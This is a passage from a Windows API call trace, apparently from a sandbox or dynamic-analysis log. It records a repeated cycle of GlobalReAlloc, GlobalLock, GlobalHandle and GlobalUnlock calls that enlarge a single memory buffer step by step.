0xb40084 [0030.324] GlobalUnlock (hMem=0xb40084) returned 0 [0030.324] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1a000, uFlags=0x2) returned 0xb40084 [0030.324] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.324] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.324] GlobalUnlock (hMem=0xb40084) returned 0 [0030.324] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1c000, uFlags=0x2) returned 0xb40084 [0030.324] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.325] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.325] GlobalUnlock (hMem=0xb40084) returned 0 [0030.325] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1e000, uFlags=0x2) returned 0xb40084 [0030.325] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.325] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.325] GlobalUnlock (hMem=0xb40084) returned 0 [0030.325] GlobalReAlloc (hMem=0xb40084, dwBytes=0x20000, uFlags=0x2) returned 0xb40084 [0030.325] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.326] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.326] GlobalUnlock (hMem=0xb40084) returned 0 [0030.326] GlobalReAlloc (hMem=0xb40084, dwBytes=0x22000, uFlags=0x2) returned 0xb40084 [0030.326] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.327] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.327] GlobalUnlock (hMem=0xb40084) returned 0 [0030.327] GlobalReAlloc (hMem=0xb40084, dwBytes=0x24000, uFlags=0x2) returned 0xb40084 [0030.327] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.327] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.327] GlobalUnlock (hMem=0xb40084) returned 0 [0030.327] GlobalReAlloc (hMem=0xb40084, dwBytes=0x26000, uFlags=0x2) returned 0xb40084 [0030.327] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.328] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.328] GlobalUnlock (hMem=0xb40084) returned 0 [0030.328] GlobalReAlloc (hMem=0xb40084, dwBytes=0x28000, uFlags=0x2) returned 0xb40084 [0030.328] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.328] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.328] GlobalUnlock (hMem=0xb40084) returned 0 [0030.328] GlobalReAlloc (hMem=0xb40084, dwBytes=0x2a000, uFlags=0x2) returned 0xb40084 [0030.328] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.329] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.329] GlobalUnlock (hMem=0xb40084) returned 0 [0030.329] GlobalReAlloc (hMem=0xb40084, dwBytes=0x2c000, uFlags=0x2) returned 0xb40084 [0030.329] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.329] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.330] GlobalUnlock (hMem=0xb40084) returned 0 [0030.330] GlobalReAlloc (hMem=0xb40084, dwBytes=0x2e000, uFlags=0x2) returned 0xb40084 [0030.330] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.330] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.330] GlobalUnlock (hMem=0xb40084) returned 0 [0030.330] GlobalReAlloc (hMem=0xb40084, dwBytes=0x30000, uFlags=0x2) returned 0xb40084 [0030.330] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.331] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.331] GlobalUnlock (hMem=0xb40084) returned 0 [0030.331] GlobalReAlloc (hMem=0xb40084, dwBytes=0x32000, uFlags=0x2) returned 0xb40084 [0030.331] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.331] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.331] GlobalUnlock (hMem=0xb40084) returned 0 [0030.331] GlobalReAlloc (hMem=0xb40084, dwBytes=0x34000, uFlags=0x2) returned 0xb40084 [0030.331] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.332] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.332] GlobalUnlock (hMem=0xb40084) returned 0 [0030.332] GlobalReAlloc (hMem=0xb40084, dwBytes=0x36000, uFlags=0x2) returned 0xb40084 [0030.332] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.332] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.332] GlobalUnlock (hMem=0xb40084) returned 0 [0030.332] GlobalReAlloc (hMem=0xb40084, dwBytes=0x38000, uFlags=0x2) returned 0xb40084 [0030.333] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.333] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.333] GlobalUnlock (hMem=0xb40084) returned 0 [0030.333] GlobalReAlloc (hMem=0xb40084, dwBytes=0x3a000, uFlags=0x2) returned 0xb40084 [0030.333] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.334] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.334] GlobalUnlock (hMem=0xb40084) returned 0 [0030.334] GlobalReAlloc (hMem=0xb40084, dwBytes=0x3c000, uFlags=0x2) returned 0xb40084 [0030.334] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.334] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.334] GlobalUnlock (hMem=0xb40084) returned 0 [0030.334] GlobalReAlloc (hMem=0xb40084, dwBytes=0x3e000, uFlags=0x2) returned 0xb40084 [0030.334] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.335] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.335] GlobalUnlock (hMem=0xb40084) returned 0 [0030.335] GlobalReAlloc (hMem=0xb40084, dwBytes=0x40000, uFlags=0x2) returned 0xb40084 [0030.338] GlobalLock (hMem=0xb40084) returned 0x5532eb8 [0030.339] GlobalHandle (pMem=0x5532eb8) returned 0xb40084 [0030.339] GlobalUnlock (hMem=0xb40084) returned 0 [0030.339] GlobalReAlloc (hMem=0xb40084, dwBytes=0x42000, uFlags=0x2) returned 0xb40084 [0030.342] GlobalLock (hMem=0xb40084) returned 0x5572ec8 [0030.343] GlobalHandle (pMem=0x5572ec8) returned 0xb40084 [0030.343] GlobalUnlock (hMem=0xb40084) returned 0 [0030.343] GlobalReAlloc (hMem=0xb40084, dwBytes=0x44000, uFlags=0x2) returned 0xb40084 [0030.343] GlobalLock (hMem=0xb40084) returned 0x5572ec8 [0030.343] GlobalHandle (pMem=0x5572ec8) returned 0xb40084 [0030.343] GlobalUnlock (hMem=0xb40084) returned 0 [0030.343] GlobalReAlloc (hMem=0xb40084, dwBytes=0x46000, uFlags=0x2) returned 0xb40084 [0030.343] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.344] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.344] GlobalUnlock (hMem=0xb40084) returned 0 [0030.344] GlobalReAlloc (hMem=0xb40084, dwBytes=0x48000, uFlags=0x2) returned 0xb40084 [0030.344] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.344] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.344] GlobalUnlock (hMem=0xb40084) returned 0 [0030.345] GlobalReAlloc (hMem=0xb40084, dwBytes=0x4a000, uFlags=0x2) returned 0xb40084 [0030.345] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.345] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.345] GlobalUnlock (hMem=0xb40084) returned 0 [0030.345] GlobalReAlloc (hMem=0xb40084, dwBytes=0x4c000, uFlags=0x2) returned 0xb40084 [0030.345] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.346] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.346] GlobalUnlock (hMem=0xb40084) returned 0 [0030.346] GlobalReAlloc (hMem=0xb40084, dwBytes=0x4e000, uFlags=0x2) returned 0xb40084 [0030.346] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.346] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.346] GlobalUnlock (hMem=0xb40084) returned 0 [0030.346] GlobalReAlloc (hMem=0xb40084, dwBytes=0x50000, uFlags=0x2) returned 0xb40084 [0030.346] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.347] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.347] GlobalUnlock (hMem=0xb40084) returned 0 [0030.347] GlobalReAlloc (hMem=0xb40084, dwBytes=0x52000, uFlags=0x2) returned 0xb40084 [0030.347] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.347] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.347] GlobalUnlock (hMem=0xb40084) returned 0 [0030.347] GlobalReAlloc (hMem=0xb40084, dwBytes=0x54000, uFlags=0x2) returned 0xb40084 [0030.348] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.348] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.348] GlobalUnlock (hMem=0xb40084) returned 0 [0030.348] GlobalReAlloc (hMem=0xb40084, dwBytes=0x56000, uFlags=0x2) returned 0xb40084 [0030.348] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.349] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.349] GlobalUnlock (hMem=0xb40084) returned 0 [0030.349] GlobalReAlloc (hMem=0xb40084, dwBytes=0x58000, uFlags=0x2) returned 0xb40084 [0030.349] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.349] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.349] GlobalUnlock (hMem=0xb40084) returned 0 [0030.349] GlobalReAlloc (hMem=0xb40084, dwBytes=0x5a000, uFlags=0x2) returned 0xb40084 [0030.349] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.350] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.350] GlobalUnlock (hMem=0xb40084) returned 0 [0030.350] GlobalReAlloc (hMem=0xb40084, dwBytes=0x5c000, uFlags=0x2) returned 0xb40084 [0030.350] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.350] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.350] GlobalUnlock (hMem=0xb40084) returned 0 [0030.350] GlobalReAlloc (hMem=0xb40084, dwBytes=0x5e000, uFlags=0x2) returned 0xb40084 [0030.350] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.351] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.351] GlobalUnlock (hMem=0xb40084) returned 0 [0030.351] GlobalReAlloc (hMem=0xb40084, dwBytes=0x60000, uFlags=0x2) returned 0xb40084 [0030.351] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.352] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.352] GlobalUnlock (hMem=0xb40084) returned 0 [0030.352] GlobalReAlloc (hMem=0xb40084, dwBytes=0x62000, uFlags=0x2) returned 0xb40084 [0030.352] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.352] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.352] GlobalUnlock (hMem=0xb40084) returned 0 [0030.352] GlobalReAlloc (hMem=0xb40084, dwBytes=0x64000, uFlags=0x2) returned 0xb40084 [0030.352] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.353] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.353] GlobalUnlock (hMem=0xb40084) returned 0 [0030.353] GlobalReAlloc (hMem=0xb40084, dwBytes=0x66000, uFlags=0x2) returned 0xb40084 [0030.353] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.353] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.353] GlobalUnlock (hMem=0xb40084) returned 0 [0030.353] GlobalReAlloc (hMem=0xb40084, dwBytes=0x68000, uFlags=0x2) returned 0xb40084 [0030.353] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.354] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.354] GlobalUnlock (hMem=0xb40084) returned 0 [0030.354] GlobalReAlloc (hMem=0xb40084, dwBytes=0x6a000, uFlags=0x2) returned 0xb40084 [0030.354] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.354] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.354] GlobalUnlock (hMem=0xb40084) returned 0 [0030.355] GlobalReAlloc (hMem=0xb40084, dwBytes=0x6c000, uFlags=0x2) returned 0xb40084 [0030.355] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.355] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.355] GlobalUnlock (hMem=0xb40084) returned 0 [0030.355] GlobalReAlloc (hMem=0xb40084, dwBytes=0x6e000, uFlags=0x2) returned 0xb40084 [0030.355] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.356] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.356] GlobalUnlock (hMem=0xb40084) returned 0 [0030.356] GlobalReAlloc (hMem=0xb40084, dwBytes=0x70000, uFlags=0x2) returned 0xb40084 [0030.356] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.356] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.356] GlobalUnlock (hMem=0xb40084) returned 0 [0030.356] GlobalReAlloc (hMem=0xb40084, dwBytes=0x72000, uFlags=0x2) returned 0xb40084 [0030.356] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.357] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.357] GlobalUnlock (hMem=0xb40084) returned 0 [0030.357] GlobalReAlloc (hMem=0xb40084, dwBytes=0x74000, uFlags=0x2) returned 0xb40084 [0030.357] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.357] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.357] GlobalUnlock (hMem=0xb40084) returned 0 [0030.357] GlobalReAlloc (hMem=0xb40084, dwBytes=0x76000, uFlags=0x2) returned 0xb40084 [0030.357] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.358] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.358] GlobalUnlock (hMem=0xb40084) returned 0 [0030.358] GlobalReAlloc (hMem=0xb40084, dwBytes=0x78000, uFlags=0x2) returned 0xb40084 [0030.358] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.358] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.359] GlobalUnlock (hMem=0xb40084) returned 0 [0030.359] GlobalReAlloc (hMem=0xb40084, dwBytes=0x7a000, uFlags=0x2) returned 0xb40084 [0030.359] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.359] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.359] GlobalUnlock (hMem=0xb40084) returned 0 [0030.359] GlobalReAlloc (hMem=0xb40084, dwBytes=0x7c000, uFlags=0x2) returned 0xb40084 [0030.359] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.360] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.360] GlobalUnlock (hMem=0xb40084) returned 0 [0030.360] GlobalReAlloc (hMem=0xb40084, dwBytes=0x7e000, uFlags=0x2) returned 0xb40084 [0030.360] GlobalLock (hMem=0xb40084) returned 0x54f4ea8 [0030.360] GlobalHandle (pMem=0x54f4ea8) returned 0xb40084 [0030.360] GlobalUnlock (hMem=0xb40084) returned 0 [0030.360] GlobalReAlloc (hMem=0xb40084, dwBytes=0x80000, uFlags=0x2) returned 0xb40084 [0030.374] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0030.375] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0030.375] GlobalUnlock (hMem=0xb40084) returned 0 [0030.375] GlobalReAlloc (hMem=0xb40084, dwBytes=0x82000, uFlags=0x2) returned 0xb40084 [0030.429] GlobalLock (hMem=0xb40084) returned 0x6c30020 [0030.430] GlobalHandle (pMem=0x6c30020) returned 0xb40084 [0030.430] GlobalUnlock (hMem=0xb40084) returned 0 [0030.430] GlobalReAlloc (hMem=0xb40084, dwBytes=0x84000, uFlags=0x2) returned 0xb40084 [0030.440] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0030.441] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0030.441] GlobalUnlock (hMem=0xb40084) returned 0 [0030.441] GlobalReAlloc (hMem=0xb40084, dwBytes=0x86000, uFlags=0x2) returned 0xb40084 [0030.451] GlobalLock (hMem=0xb40084) returned 0x6c30020 [0030.452] GlobalHandle (pMem=0x6c30020) returned 0xb40084 [0030.452] GlobalUnlock (hMem=0xb40084) returned 0 [0030.452] GlobalReAlloc (hMem=0xb40084, dwBytes=0x88000, uFlags=0x2) returned 0xb40084 [0030.463] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0030.464] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0030.464] GlobalUnlock (hMem=0xb40084) returned 0 [0030.464] GlobalReAlloc (hMem=0xb40084, dwBytes=0x8a000, uFlags=0x2) returned 0xb40084 [0030.474] GlobalLock (hMem=0xb40084) returned 0x6c30020 [0030.476] GlobalHandle (pMem=0x6c30020) returned 0xb40084 [0030.476] GlobalUnlock (hMem=0xb40084) returned 0 [0030.476] GlobalReAlloc (hMem=0xb40084, dwBytes=0x8c000, uFlags=0x2) returned 0xb40084 [0030.487] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0030.489] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0030.489] GlobalUnlock (hMem=0xb40084) returned 0 [0030.489] GlobalReAlloc (hMem=0xb40084, dwBytes=0x8e000, uFlags=0x2) returned 0xb40084 [0030.500] GlobalLock (hMem=0xb40084) returned 0x6c30020 [0030.501] GlobalHandle (pMem=0x6c30020) returned 0xb40084 [0030.501] GlobalUnlock (hMem=0xb40084) returned 0 [0030.501] GlobalReAlloc (hMem=0xb40084, dwBytes=0x90000, uFlags=0x2) returned 0xb40084 [0030.512] GlobalLock (hMem=0xb40084) returned 0x6cc0020 [0030.513] GlobalHandle (pMem=0x6cc0020) returned 0xb40084 [0030.513] GlobalUnlock (hMem=0xb40084) returned 0 [0030.513] GlobalReAlloc (hMem=0xb40084, dwBytes=0x92000, uFlags=0x2) returned 0xb40084 [0030.531] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0030.532] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0030.532] GlobalUnlock (hMem=0xb40084) returned 0 [0030.532] GlobalReAlloc (hMem=0xb40084, dwBytes=0x94000, uFlags=0x2) returned 0xb40084 [0030.543] GlobalLock (hMem=0xb40084) returned 0x6c40020 [0030.544] GlobalHandle (pMem=0x6c40020) returned 0xb40084 [0030.544] GlobalUnlock (hMem=0xb40084) returned 0 [0030.544] GlobalReAlloc (hMem=0xb40084, dwBytes=0x96000, uFlags=0x2) returned 0xb40084 [0030.556] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0030.557] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0030.557] GlobalUnlock (hMem=0xb40084) returned 0 [0030.557] GlobalReAlloc (hMem=0xb40084, dwBytes=0x98000, uFlags=0x2) returned 0xb40084 [0030.568] GlobalLock (hMem=0xb40084) returned 0x6c40020 [0030.569] GlobalHandle (pMem=0x6c40020) returned 0xb40084 [0030.569] GlobalUnlock (hMem=0xb40084) returned 0 [0030.569] GlobalReAlloc (hMem=0xb40084, dwBytes=0x9a000, uFlags=0x2) returned 0xb40084 [0030.581] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0030.582] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0030.582] GlobalUnlock (hMem=0xb40084) returned 0 [0030.582] GlobalReAlloc (hMem=0xb40084, dwBytes=0x9c000, uFlags=0x2) returned 0xb40084 [0030.599] GlobalLock (hMem=0xb40084) returned 0x6c40020 [0030.600] GlobalHandle (pMem=0x6c40020) returned 0xb40084 [0030.600] GlobalUnlock (hMem=0xb40084) returned 0 [0030.600] GlobalReAlloc (hMem=0xb40084, dwBytes=0x9e000, uFlags=0x2) returned 0xb40084 [0030.612] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0030.613] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0030.613] GlobalUnlock (hMem=0xb40084) returned 0 [0030.613] GlobalReAlloc (hMem=0xb40084, dwBytes=0xa0000, uFlags=0x2) returned 0xb40084 [0030.625] GlobalLock (hMem=0xb40084) returned 0x6c40020 [0030.626] GlobalHandle (pMem=0x6c40020) returned 0xb40084 [0030.626] GlobalUnlock (hMem=0xb40084) returned 0 [0030.626] GlobalReAlloc (hMem=0xb40084, dwBytes=0xa2000, uFlags=0x2) returned 0xb40084 [0030.639] GlobalLock (hMem=0xb40084) returned 0x6cf0020 [0030.640] GlobalHandle (pMem=0x6cf0020) returned 0xb40084 [0030.640] GlobalUnlock (hMem=0xb40084) returned 0 [0030.640] GlobalReAlloc (hMem=0xb40084, dwBytes=0xa4000, uFlags=0x2) returned 0xb40084 [0030.652] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0030.653] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0030.653] GlobalUnlock (hMem=0xb40084) returned 0 [0030.653] GlobalReAlloc (hMem=0xb40084, dwBytes=0xa6000, uFlags=0x2) returned 0xb40084 [0030.666] GlobalLock (hMem=0xb40084) returned 0x6c50020 [0030.667] GlobalHandle (pMem=0x6c50020) returned 0xb40084 [0030.667] GlobalUnlock (hMem=0xb40084) returned 0 [0030.667] GlobalReAlloc (hMem=0xb40084, dwBytes=0xa8000, uFlags=0x2) returned 0xb40084 [0030.680] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0030.681] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0030.681] GlobalUnlock (hMem=0xb40084) returned 0 [0030.681] GlobalReAlloc (hMem=0xb40084, dwBytes=0xaa000, uFlags=0x2) returned 0xb40084 [0030.694] GlobalLock (hMem=0xb40084) returned 0x6c50020 [0030.695] GlobalHandle (pMem=0x6c50020) returned 0xb40084 [0030.695] GlobalUnlock (hMem=0xb40084) returned 0 [0030.695] GlobalReAlloc (hMem=0xb40084, dwBytes=0xac000, uFlags=0x2) returned 0xb40084 [0030.708] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0030.710] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0030.710] GlobalUnlock (hMem=0xb40084) returned 0 [0030.710] GlobalReAlloc (hMem=0xb40084, dwBytes=0xae000, uFlags=0x2) returned 0xb40084 [0030.723] GlobalLock (hMem=0xb40084) returned 0x6c50020 [0030.724] GlobalHandle (pMem=0x6c50020) returned 0xb40084 [0030.724] GlobalUnlock (hMem=0xb40084) returned 0 [0030.724] GlobalReAlloc (hMem=0xb40084, dwBytes=0xb0000, uFlags=0x2) returned 0xb40084 [0030.737] GlobalLock (hMem=0xb40084) returned 0x6d00020 [0030.738] GlobalHandle (pMem=0x6d00020) returned 0xb40084 [0030.738] GlobalUnlock (hMem=0xb40084) returned 0 [0030.738] GlobalReAlloc (hMem=0xb40084, dwBytes=0xb2000, uFlags=0x2) returned 0xb40084 [0030.752] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0030.753] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0030.753] GlobalUnlock (hMem=0xb40084) returned 0 [0030.753] GlobalReAlloc (hMem=0xb40084, dwBytes=0xb4000, uFlags=0x2) returned 0xb40084 [0030.766] GlobalLock (hMem=0xb40084) returned 0x6c60020 [0030.767] GlobalHandle (pMem=0x6c60020) returned 0xb40084 [0030.767] GlobalUnlock (hMem=0xb40084) returned 0 [0030.767] GlobalReAlloc (hMem=0xb40084, dwBytes=0xb6000, uFlags=0x2) returned 0xb40084 [0030.782] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0030.783] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0030.783] GlobalUnlock (hMem=0xb40084) returned 0 [0030.783] GlobalReAlloc (hMem=0xb40084, dwBytes=0xb8000, uFlags=0x2) returned 0xb40084 [0030.797] GlobalLock (hMem=0xb40084) returned 0x6c60020 [0030.798] GlobalHandle (pMem=0x6c60020) returned 0xb40084 [0030.798] GlobalUnlock (hMem=0xb40084) returned 0 [0030.798] GlobalReAlloc (hMem=0xb40084, dwBytes=0xba000, uFlags=0x2) returned 0xb40084 [0030.812] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0030.813] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0030.813] GlobalUnlock (hMem=0xb40084) returned 0 [0030.813] GlobalReAlloc (hMem=0xb40084, dwBytes=0xbc000, uFlags=0x2) returned 0xb40084 [0030.827] GlobalLock (hMem=0xb40084) returned 0x6c60020 [0030.828] GlobalHandle (pMem=0x6c60020) returned 0xb40084 [0030.828] GlobalUnlock (hMem=0xb40084) returned 0 [0030.828] GlobalReAlloc (hMem=0xb40084, dwBytes=0xbe000, uFlags=0x2) returned 0xb40084 [0030.843] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0030.844] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0030.844] GlobalUnlock (hMem=0xb40084) returned 0 [0030.844] GlobalReAlloc (hMem=0xb40084, dwBytes=0xc0000, uFlags=0x2) returned 0xb40084 [0030.859] GlobalLock (hMem=0xb40084) returned 0x6c60020 [0030.860] GlobalHandle (pMem=0x6c60020) returned 0xb40084 [0030.860] GlobalUnlock (hMem=0xb40084) returned 0 [0030.860] GlobalReAlloc (hMem=0xb40084, dwBytes=0xc2000, uFlags=0x2) returned 0xb40084 [0030.874] GlobalLock (hMem=0xb40084) returned 0x6d30020 [0030.875] GlobalHandle (pMem=0x6d30020) returned 0xb40084 [0030.875] GlobalUnlock (hMem=0xb40084) returned 0 [0030.875] GlobalReAlloc (hMem=0xb40084, dwBytes=0xc4000, uFlags=0x2) returned 0xb40084 [0030.891] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0030.892] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0030.892] GlobalUnlock (hMem=0xb40084) returned 0 [0030.892] GlobalReAlloc (hMem=0xb40084, dwBytes=0xc6000, uFlags=0x2) returned 0xb40084 [0030.907] GlobalLock (hMem=0xb40084) returned 0x6c70020 [0030.908] GlobalHandle (pMem=0x6c70020) returned 0xb40084 [0030.908] GlobalUnlock (hMem=0xb40084) returned 0 [0030.908] GlobalReAlloc (hMem=0xb40084, dwBytes=0xc8000, uFlags=0x2) returned 0xb40084 [0030.923] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0030.924] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0030.924] GlobalUnlock (hMem=0xb40084) returned 0 [0030.924] GlobalReAlloc (hMem=0xb40084, dwBytes=0xca000, uFlags=0x2) returned 0xb40084 [0030.940] GlobalLock (hMem=0xb40084) returned 0x6c70020 [0030.941] GlobalHandle (pMem=0x6c70020) returned 0xb40084 [0030.941] GlobalUnlock (hMem=0xb40084) returned 0 [0030.941] GlobalReAlloc (hMem=0xb40084, dwBytes=0xcc000, uFlags=0x2) returned 0xb40084 [0030.956] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0030.957] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0030.957] GlobalUnlock (hMem=0xb40084) returned 0 [0030.957] GlobalReAlloc (hMem=0xb40084, dwBytes=0xce000, uFlags=0x2) returned 0xb40084 [0030.983] GlobalLock (hMem=0xb40084) returned 0x6c70020 [0030.984] GlobalHandle (pMem=0x6c70020) returned 0xb40084 [0030.984] GlobalUnlock (hMem=0xb40084) returned 0 [0030.984] GlobalReAlloc (hMem=0xb40084, dwBytes=0xd0000, uFlags=0x2) returned 0xb40084 [0031.000] GlobalLock (hMem=0xb40084) returned 0x6d40020 [0031.001] GlobalHandle (pMem=0x6d40020) returned 0xb40084 [0031.001] GlobalUnlock (hMem=0xb40084) returned 0 [0031.001] GlobalReAlloc (hMem=0xb40084, dwBytes=0xd2000, uFlags=0x2) returned 0xb40084 [0031.017] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0031.018] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0031.018] GlobalUnlock (hMem=0xb40084) returned 0 [0031.018] GlobalReAlloc (hMem=0xb40084, dwBytes=0xd4000, uFlags=0x2) returned 0xb40084 [0031.035] GlobalLock (hMem=0xb40084) returned 0x6c80020 [0031.036] GlobalHandle (pMem=0x6c80020) returned 0xb40084 [0031.036] GlobalUnlock (hMem=0xb40084) returned 0 [0031.036] GlobalReAlloc (hMem=0xb40084, dwBytes=0xd6000, uFlags=0x2) returned 0xb40084 [0031.052] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0031.053] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0031.053] GlobalUnlock (hMem=0xb40084) returned 0 [0031.054] GlobalReAlloc (hMem=0xb40084, dwBytes=0xd8000, uFlags=0x2) returned 0xb40084 [0031.070] GlobalLock (hMem=0xb40084) returned 0x6c80020 [0031.071] GlobalHandle (pMem=0x6c80020) returned 0xb40084 [0031.071] GlobalUnlock (hMem=0xb40084) returned 0 [0031.071] GlobalReAlloc (hMem=0xb40084, dwBytes=0xda000, uFlags=0x2) returned 0xb40084 [0031.089] GlobalLock (hMem=0xb40084) 